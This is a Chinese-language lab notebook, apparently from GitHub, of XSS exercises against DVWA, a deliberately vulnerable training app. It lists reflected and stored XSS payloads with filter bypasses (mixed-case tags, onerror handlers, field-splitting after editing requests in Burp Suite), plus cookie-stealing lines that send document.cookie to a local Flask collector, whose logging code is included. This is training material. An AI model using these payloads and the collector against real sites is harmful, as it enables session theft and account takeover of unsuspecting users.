链接: https://github.com/dhgdhg/DVWA-Note

  1. XSS(Reflected)

    • chrome 浏览器需要先chrome.exe -disable-xss-auditor

    • low

      • <script>alert(document.cookie)</script>

      • 所以可以偷饼干啦, 哈哈哈, 冲啊

      • JS

          <script>img=new Image();img.src="http://127.0.0.1:5000/?cookie="+document.cookie</script>

      • 服务端

        • 代码

            #a.py
  from flask import Flask, request

  app = Flask(__name__)

  @app.route('/')
  def get_cookie():
      cookie = request.args.get("cookie")
      ip = request.remote_addr
      with open('ip-cookie.txt', 'ab+') as f:
          f.write('{}  {}\n'.format(ip, cookie).encode('utf8'))
      return ''

        • 运行

          • env FLASK_APP=a.py flask run

      • 舒服

    • medium

      • <script>alert(document.cookie)</script>
      • 返回Hello alert(document.cookie), 黑人蒙蔽, 我script去哪了
      • 试试大小写<ScRipt>alert(document.cookie)</ScRipt>
      • 请您收下我的中指, 哈哈哈哈
      • <ScRipt>img=new Image();img.src="http://127.0.0.1:5000/?cookie="+document.cookie</ScRipt>
      • 偷饼干ing....

    • high

      • <script>alert(document.cookie)</script>

      • Hello >, 返回这个可还行

      • 试试大小写<ScRipt>alert(document.cookie)</ScRipt>, emm, 可还行

      • 再试试这个script, Hello script

      • <script, Hello ,可还行

      • 那我不用script了, 很烦

      • <img src=x onerror=alert(1)>, <iframe onload=alert(1)> Beng!

      • <img src=x onerror=windows.open("http://127.0.0.1:5000/?cookie="+document.cookie)> Beng!

      • 供上精品payload

        • <img src=x onerror=src='http://127.0.0.1:5000/?cookie='+document.cookie>

      • 服务端代码

          from flask import Flask, request
  from flask_limiter import Limiter
  from flask_limiter.util import get_remote_address

  app = Flask(__name__)
  limiter = Limiter(
      app,
      key_func=get_remote_address, 
      default_limits=["1 per hour"] 
  )

  @app.route('/')
  def get_cookie():
      cookie = request.args.get("cookie")
      ip = request.remote_addr
      with open('ip-cookie.txt', 'ab+') as f:
          f.write('{}  {}\n'.format(ip, cookie).encode('utf8'))
      return ''

  2. XSS(Stored)

    • low
      • name : 1
      • message: <script>alert(1)</script>
    • medium
      • name : 1
      • message: <script>alert(1)</script>
        • 凉凉
      • name : 1
      • message: <ScRipt>alert(1)</SCrIpt>
        • 凉凉
      • name : 1
      • message: <ScscriptRipt>alert(1)</SCrscriptIpt>
        • 凉凉
      • name: 1
      • message: <img src=1 onerror=alert(1)>
        • 凉凉
      • name: <scRipt>
      • message: 1
        • 嗯哼
        • name最大字符串长度为10, emm
        • name: <scRipt>/*
        • messgae:1
        • name: 2
        • messgae:*/alert(1);/*
          • 凉凉
      • 用burpsuit抓虾堡, 改改长度, 看看他是不是只是在前端进行长度限制
      • 舒服了
        • burpsuit
          • name: <scRipt>alert(1)</scRipt>
          • messge: <scRipt>alert(2)</scRipt>
          • messge 对script标签过滤了, 不过name没过滤, 老铁, ODK
    • high
      • burpsuit
        • name: <scRipt>alert(5)</scRipt>
        • messge: 6
        • name:<img src=x onerror=alert(6)>, <iframe onload=alert(7)>
          • duang